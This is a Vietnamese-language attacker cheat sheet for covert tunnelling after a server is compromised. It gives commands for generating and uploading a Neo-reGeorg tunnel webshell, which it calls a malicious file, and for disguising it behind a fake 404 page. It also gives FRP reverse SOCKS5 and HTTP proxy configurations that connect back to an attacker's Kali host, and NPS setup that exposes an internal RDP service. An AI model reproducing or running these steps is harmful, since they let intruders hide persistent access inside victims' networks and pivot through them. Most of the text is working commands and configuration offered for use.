Tạo ống dẫn ẩn NEO-regeorg
Công cụ tạo proxy HTTP bằng Python
Sử dụng cơ bản
1.Xác định mật khẩu kết nối
python .\neoreg.py generate -k matkhau -o duongdanxuat
Ví dụ:
python .\neoreg.py generate -k matkhau
2.Upload tệp tin chứa mã độc lên máy chủ mục tiêu
3.Kết nối đến mục tiêu, script sẽ tạo ra cổng socks5 tại địa phương 1080
Sử dụng socks5: 127.0.0.1:1080
python .\neoreg.py -k matkhau -u diachimuc tieu
Ví dụ:
python .\neoreg.py -k matkhau -u http://www.tst.com/tunnel.php<br></br><br></br>#Gặp lỗi có thể dùng --skip để bỏ qua<br></br>python .\neoreg.py -k pass -u http://www.test.com/tunnel.php --skip<br></br>Yêu cầu cài đặt requests<br></br>pip3 install requests
4.Hoạt động tốt với trang 200, có thể giả lập 404
python .\neoreg.py -k matkhau --file 404.html --httpcode 404 -o test2
Tạo ống dẫn FRP
https://github.com/fatedier/frp/releases
1.Socks5 proxy ngược
Cấu hình server<br></br>[common]<br></br>bind_addr=0.0.0.0<br></br>bind_port=1234<br></br>[socks5]<br></br>type=tcp<br></br>remote_port=1080<br></br>plugin=socks5<br></br><br></br>Cấu hình client<br></br>[common]<br></br>server_addr=ip_kali<br></br>server_port=1234<br></br>[socks5]<br></br>type=tcp<br></br>remote_port=1080<br></br>plugin=socks5
Thêm socks5 vào proxychains
2.Proxy HTTP ngược
Cấu hình server, upload frps và frps.ini<br></br>[common]
bind_addr=0.0.0.0
bind_port=1234
[http_proxy]
type=tcp
remote_port=1080
plugin=http_proxy <br></br><br></br>Cấu hình client, upload frpc và frpc.ini<br></br>[common]
server_addr=ip_kali
server_port=1234
[http_proxy]
type=tcp
remote_port=1080
plugin=http_proxy<br></br><br></br>#Sử dụng
frps -c frps.ini
frpc -c frpc.ini<br></br><br></br>#Thêm cổng http proxy 1080
Xây dựng ống dẫn NPS
Cài đặt vận hành
NPS gồm server và client, cổng quản lý mặc định 8080, tài khoản admin/123
Lệnh vận hành:
Server:
Cài đặt nps install
Khởi động|Dừng|Khởi động lại nps start|stop|restart<br></br>Tải lại cấu hình nps reload<br></br>Cập nhật nps update
Client
(Không cần file cấu hình)<br></br>Kết nối server npc -server=ip:port -vkey=khóa xác thực (cấu hình trên server)<br></br>Đăng ký dịch vụ npc install -server=ip:port -vkey=khóa xác thực<br></br>Khởi động|Dừng|Khởi động lại npc start|stop|restart<br></br>Gỡ cài đặt nps uninstall
Tunnel TCP
Qua giao diện web chọn client đã kết nối, cấu hình tunnel
Truy cập cổng 3389 nội mạng, ánh xạ sang 1111 cục bộ
Tạo mới - Mục tiêu 192.168.2.2:3389 - Cổng server 1111
Kết nối RDP: rdesktop 127.0.0.1:1111